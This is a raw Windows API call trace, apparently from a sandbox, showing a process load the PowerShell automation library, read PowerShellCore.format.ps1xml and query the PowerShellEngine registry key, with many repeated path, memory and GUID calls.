	[0162.096] GetLastError () returned 0x0
	[0162.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.096] GetLastError () returned 0x0
	[0162.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.096] GetLastError () returned 0x0
	[0162.096] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x126bcae9, Data2=0xfe63, Data3=0x46c0, Data4=([0]=0x81, [1]=0xe5, [2]=0xd7, [3]=0x52, [4]=0x45, [5]=0x16, [6]=0xab, [7]=0xb3))) returned 0x0
	[0162.097] VirtualQuery (in: lpAddress=0x10ceb4, lpBuffer=0x10deb4, dwLength=0x1c | out: lpBuffer=0x10deb4*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.097] GetLastError () returned 0x0
	[0162.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.097] GetLastError () returned 0x0
	[0162.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.097] GetLastError () returned 0x0
	[0162.098] VirtualQuery (in: lpAddress=0x10ceb4, lpBuffer=0x10deb4, dwLength=0x1c | out: lpBuffer=0x10deb4*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.098] VirtualQuery (in: lpAddress=0x10cef0, lpBuffer=0x10def0, dwLength=0x1c | out: lpBuffer=0x10def0*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d8a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.098] GetLastError () returned 0x0
	[0162.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d858, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.098] GetLastError () returned 0x0
	[0162.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d858, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.099] GetLastError () returned 0x0
	[0162.099] VirtualQuery (in: lpAddress=0x10ceb4, lpBuffer=0x10deb4, dwLength=0x1c | out: lpBuffer=0x10deb4*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.099] VirtualQuery (in: lpAddress=0x10cef0, lpBuffer=0x10def0, dwLength=0x1c | out: lpBuffer=0x10def0*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d8a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.099] GetLastError () returned 0x0
	[0162.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d858, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.099] GetLastError () returned 0x0
	[0162.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d858, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.099] GetLastError () returned 0x0
	[0162.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.100] GetLastError () returned 0x0
	[0162.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.100] GetLastError () returned 0x0
	[0162.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.100] GetLastError () returned 0x0
	[0162.100] VirtualQuery (in: lpAddress=0x10ceb4, lpBuffer=0x10deb4, dwLength=0x1c | out: lpBuffer=0x10deb4*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.101] VirtualQuery (in: lpAddress=0x10cef0, lpBuffer=0x10def0, dwLength=0x1c | out: lpBuffer=0x10def0*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.105] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x786a44d7, Data2=0xf63c, Data3=0x4d5d, Data4=([0]=0x9e, [1]=0x67, [2]=0x2c, [3]=0xf7, [4]=0xc4, [5]=0x5f, [6]=0x3d, [7]=0x1c))) returned 0x0
	[0162.111] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x370ffef2, Data2=0x97ee, Data3=0x4fdc, Data4=([0]=0x95, [1]=0x4, [2]=0x3e, [3]=0x6a, [4]=0xb4, [5]=0x86, [6]=0x17, [7]=0x71))) returned 0x0
	[0162.114] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x7f681dd0, Data2=0xa7e3, Data3=0x4ac9, Data4=([0]=0x8e, [1]=0xaa, [2]=0x4, [3]=0x93, [4]=0x1, [5]=0x19, [6]=0xea, [7]=0x42))) returned 0x0
	[0162.115] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xc24b1d8a, Data2=0x60a1, Data3=0x49fe, Data4=([0]=0x9b, [1]=0xa7, [2]=0x71, [3]=0xb4, [4]=0x5e, [5]=0x8a, [6]=0xc8, [7]=0x30))) returned 0x0
	[0162.115] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x7b63943c, Data2=0x4c3f, Data3=0x479c, Data4=([0]=0xb6, [1]=0x8c, [2]=0x3c, [3]=0x5d, [4]=0x86, [5]=0x98, [6]=0x8f, [7]=0xe2))) returned 0x0
	[0162.275] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x63a947a5, Data2=0xce8b, Data3=0x4afa, Data4=([0]=0x93, [1]=0xc8, [2]=0x7b, [3]=0xdc, [4]=0x7f, [5]=0x23, [6]=0x79, [7]=0x31))) returned 0x0
	[0162.276] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x57a9b005, Data2=0x24c8, Data3=0x4774, Data4=([0]=0x97, [1]=0x4e, [2]=0x76, [3]=0x1a, [4]=0x81, [5]=0x11, [6]=0xe7, [7]=0x10))) returned 0x0
	[0162.276] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x20c6404a, Data2=0x3cc9, Data3=0x4966, Data4=([0]=0x9a, [1]=0x27, [2]=0xb4, [3]=0x63, [4]=0xa1, [5]=0x69, [6]=0x7d, [7]=0x4d))) returned 0x0
	[0162.276] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xeb4a5c2b, Data2=0xd8cf, Data3=0x4182, Data4=([0]=0x86, [1]=0xa8, [2]=0x6b, [3]=0x2c, [4]=0x49, [5]=0xe9, [6]=0x49, [7]=0x6a))) returned 0x0
	[0162.277] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x4a92882d, Data2=0x8d8f, Data3=0x49ea, Data4=([0]=0xa5, [1]=0x8a, [2]=0xf2, [3]=0xb, [4]=0xe1, [5]=0x29, [6]=0x9f, [7]=0x9c))) returned 0x0
	[0162.277] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x348
	[0162.277] GetLastError () returned 0x0
	[0162.277] GetFileType (hFile=0x348) returned 0x1
	[0162.277] SetErrorMode (uMode=0x1) returned 0x1
	[0162.277] GetFileType (hFile=0x348) returned 0x1
	[0162.278] ReadFile (in: hFile=0x348, lpBuffer=0x3000574, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x3000574*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0162.475] GetLastError () returned 0x0
	[0162.498] ReadFile (in: hFile=0x348, lpBuffer=0x2997578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2997578*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0162.662] GetLastError () returned 0x0
	[0162.662] ReadFile (in: hFile=0x348, lpBuffer=0x2997578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2997578*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0162.789] GetLastError () returned 0x0
	[0162.789] ReadFile (in: hFile=0x348, lpBuffer=0x2997578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2997578*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0162.789] GetLastError () returned 0x0
	[0162.789] ReadFile (in: hFile=0x348, lpBuffer=0x2997578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2997578*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0162.789] GetLastError () returned 0x0
	[0162.789] ReadFile (in: hFile=0x348, lpBuffer=0x2997578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2997578*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0162.789] GetLastError () returned 0x0
	[0162.789] ReadFile (in: hFile=0x348, lpBuffer=0x2997578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2997578*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0162.789] GetLastError () returned 0x0
	[0162.789] ReadFile (in: hFile=0x348, lpBuffer=0x2997578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2997578*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0162.789] GetLastError () returned 0x0
	[0162.790] ReadFile (in: hFile=0x348, lpBuffer=0x2997578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2997578*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0162.790] GetLastError () returned 0x0
	[0162.792] ReadFile (in: hFile=0x348, lpBuffer=0x2997578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2997578*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0162.792] GetLastError () returned 0x0
	[0162.792] ReadFile (in: hFile=0x348, lpBuffer=0x2997578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2997578*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0162.792] GetLastError () returned 0x0
	[0162.792] ReadFile (in: hFile=0x348, lpBuffer=0x2997578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2997578*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0162.792] GetLastError () returned 0x0
	[0162.792] ReadFile (in: hFile=0x348, lpBuffer=0x2997578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2997578*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0162.792] GetLastError () returned 0x0
	[0162.792] ReadFile (in: hFile=0x348, lpBuffer=0x2997578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2997578*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0162.793] GetLastError () returned 0x0
	[0162.793] ReadFile (in: hFile=0x348, lpBuffer=0x2997578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2997578*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0162.793] GetLastError () returned 0x0
	[0162.793] ReadFile (in: hFile=0x348, lpBuffer=0x2997578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2997578*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0162.793] GetLastError () returned 0x0
	[0162.793] ReadFile (in: hFile=0x348, lpBuffer=0x2997578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2997578*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0162.793] GetLastError () returned 0x0
	[0162.794] ReadFile (in: hFile=0x348, lpBuffer=0x2997578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2997578*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0162.794] GetLastError () returned 0x0
	[0162.794] ReadFile (in: hFile=0x348, lpBuffer=0x2997578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2997578*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0162.794] GetLastError () returned 0x0
	[0162.794] ReadFile (in: hFile=0x348, lpBuffer=0x2997578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2997578*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0162.795] GetLastError () returned 0x0
	[0162.795] ReadFile (in: hFile=0x348, lpBuffer=0x2997578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2997578*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0162.795] GetLastError () returned 0x0
	[0162.795] ReadFile (in: hFile=0x348, lpBuffer=0x2997578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2997578*, lpNumberOfBytesRead=0x10e614*=0xe67, lpOverlapped=0x0) returned 1
	[0162.795] GetLastError () returned 0x0
	[0162.795] ReadFile (in: hFile=0x348, lpBuffer=0x2996bb3, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2996bb3*, lpNumberOfBytesRead=0x10e614*=0x0, lpOverlapped=0x0) returned 1
	[0162.795] GetLastError () returned 0x0
	[0162.796] ReadFile (in: hFile=0x348, lpBuffer=0x2997578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2997578*, lpNumberOfBytesRead=0x10e614*=0x0, lpOverlapped=0x0) returned 1
	[0162.796] GetLastError () returned 0x0
	[0162.797] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e598 | out: phkResult=0x10e598*=0x348) returned 0x0
	[0162.797] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10e5e0, lpData=0x0, lpcbData=0x10e5dc*=0x0 | out: lpType=0x10e5e0*=0x1, lpData=0x0, lpcbData=0x10e5dc*=0x56) returned 0x0
	[0162.797] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10e5e0, lpData=0x584bc0, lpcbData=0x10e5dc*=0x56 | out: lpType=0x10e5e0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10e5dc*=0x56) returned 0x0
	[0162.797] RegCloseKey (hKey=0x348) returned 0x0
	[0162.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0162.798] GetLastError () returned 0x0
	[0162.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e0d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0162.798] GetLastError () returned 0x0
	[0162.798] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x1aa22f2e, Data2=0xa1d8, Data3=0x46b3, Data4=([0]=0x9b, [1]=0x1d, [2]=0x5b, [3]=0x18, [4]=0xd1, [5]=0x34, [6]=0x27, [7]=0xf8))) returned 0x0
	[0162.799] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xecbba164, Data2=0x1623, Data3=0x43f3, Data4=([0]=0xba, [1]=0xf2, [2]=0x37, [3]=0x3e, [4]=0xf0, [5]=0x2, [6]=0x5d, [7]=0x3e))) returned 0x0
	[0162.799] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x6aee1f67, Data2=0x7a1b, Data3=0x4434, Data4=([0]=0x8b, [1]=0xd0, [2]=0xaf, [3]=0x2, [4]=0x20, [5]=0x1d, [6]=0x56, [7]=0x7d))) returned 0x0
	[0162.799] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xbeb5bdb2, Data2=0x4cf5, Data3=0x4dc2, Data4=([0]=0xac, [1]=0x43, [2]=0x6f, [3]=0x85, [4]=0x86, [5]=0xe7, [6]=0x71, [7]=0xaf))) returned 0x0
	[0162.799] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x1814c886, Data2=0xcd27, Data3=0x4475, Data4=([0]=0x9c, [1]=0xb5, [2]=0xbe, [3]=0x65, [4]=0xd0, [5]=0x87, [6]=0x49, [7]=0xc))) returned 0x0
	[0162.799] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xe5ac9ff, Data2=0x568d, Data3=0x45df, Data4=([0]=0xbb, [1]=0x33, [2]=0xf7, [3]=0x28, [4]=0xa5, [5]=0x10, [6]=0x8d, [7]=0x1b))) returned 0x0
	[0162.799] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x652fb6ee, Data2=0x4010, Data3=0x4289, Data4=([0]=0xa4, [1]=0x5b, [2]=0x61, [3]=0x3, [4]=0x25, [5]=0x72, [6]=0xd8, [7]=0x3c))) returned 0x0
	[0162.799] VirtualQuery (in: lpAddress=0x10d360, lpBuffer=0x10e360, dwLength=0x1c | out: lpBuffer=0x10e360*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.800] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x3ffedf2a, Data2=0x5a4c, Data3=0x4940, Data4=([0]=0x84, [1]=0xcb, [2]=0x13, [3]=0xa8, [4]=0xc4, [5]=0x91, [6]=0xa1, [7]=0xa5))) returned 0x0
	[0162.800] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x3c6e17fd, Data2=0x9d6b, Data3=0x4364, Data4=([0]=0xa6, [1]=0xd4, [2]=0xb7, [3]=0xc, [4]=0xb1, [5]=0xd5, [6]=0xb, [7]=0x40))) returned 0x0
	[0162.800] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x7757e1e2, Data2=0xf94, Data3=0x45a6, Data4=([0]=0x99, [1]=0x58, [2]=0x6, [3]=0xf1, [4]=0xe7, [5]=0xd7, [6]=0x72, [7]=0xb1))) returned 0x0
	[0162.800] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x44b6294c, Data2=0xb765, Data3=0x481c, Data4=([0]=0x82, [1]=0xcc, [2]=0x74, [3]=0x38, [4]=0x9d, [5]=0x4c, [6]=0xc0, [7]=0xc7))) returned 0x0
	[0162.800] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xf25ca030, Data2=0x108d, Data3=0x4ded, Data4=([0]=0x88, [1]=0x50, [2]=0x75, [3]=0x45, [4]=0x6f, [5]=0xaa, [6]=0x86, [7]=0xbb))) returned 0x0
	[0162.800] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x76663b, Data2=0xc95f, Data3=0x4f6f, Data4=([0]=0x8d, [1]=0x4e, [2]=0xb3, [3]=0x9e, [4]=0x53, [5]=0x64, [6]=0x68, [7]=0x63))) returned 0x0
	[0162.800] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x3c062f26, Data2=0xdc08, Data3=0x4c99, Data4=([0]=0xb7, [1]=0xa8, [2]=0xd5, [3]=0x3f, [4]=0xf9, [5]=0xef, [6]=0xcc, [7]=0x89))) returned 0x0
	[0162.800] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x752c752d, Data2=0x4b31, Data3=0x4063, Data4=([0]=0xbe, [1]=0x1c, [2]=0xaf, [3]=0x3f, [4]=0x0, [5]=0x3e, [6]=0xd5, [7]=0x48))) returned 0x0
	[0162.800] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xded30d7d, Data2=0x6296, Data3=0x4c13, Data4=([0]=0x8c, [1]=0xc8, [2]=0x82, [3]=0x8e, [4]=0x42, [5]=0x31, [6]=0xce, [7]=0x9f))) returned 0x0
	[0162.801] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x8c10f7f1, Data2=0xa7b1, Data3=0x4c55, Data4=([0]=0x98, [1]=0x42, [2]=0x4, [3]=0x48, [4]=0xc8, [5]=0x98, [6]=0x9f, [7]=0xe5))) returned 0x0
	[0162.801] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x8e422c22, Data2=0x714a, Data3=0x47ad, Data4=([0]=0xb9, [1]=0xad, [2]=0xbc, [3]=0x4b, [4]=0x8e, [5]=0xf2, [6]=0xb6, [7]=0xdd))) returned 0x0
	[0162.801] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xfcc6ac0, Data2=0x95db, Data3=0x4176, Data4=([0]=0x8f, [1]=0x8, [2]=0x34, [3]=0x22, [4]=0xd3, [5]=0x7a, [6]=0x1d, [7]=0xc9))) returned 0x0
	[0162.801] VirtualQuery (in: lpAddress=0x10d340, lpBuffer=0x10e340, dwLength=0x1c | out: lpBuffer=0x10e340*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.802] VirtualQuery (in: lpAddress=0x10d340, lpBuffer=0x10e340, dwLength=0x1c | out: lpBuffer=0x10e340*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.802] VirtualQuery (in: lpAddress=0x10d340, lpBuffer=0x10e340, dwLength=0x1c | out: lpBuffer=0x10e340*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
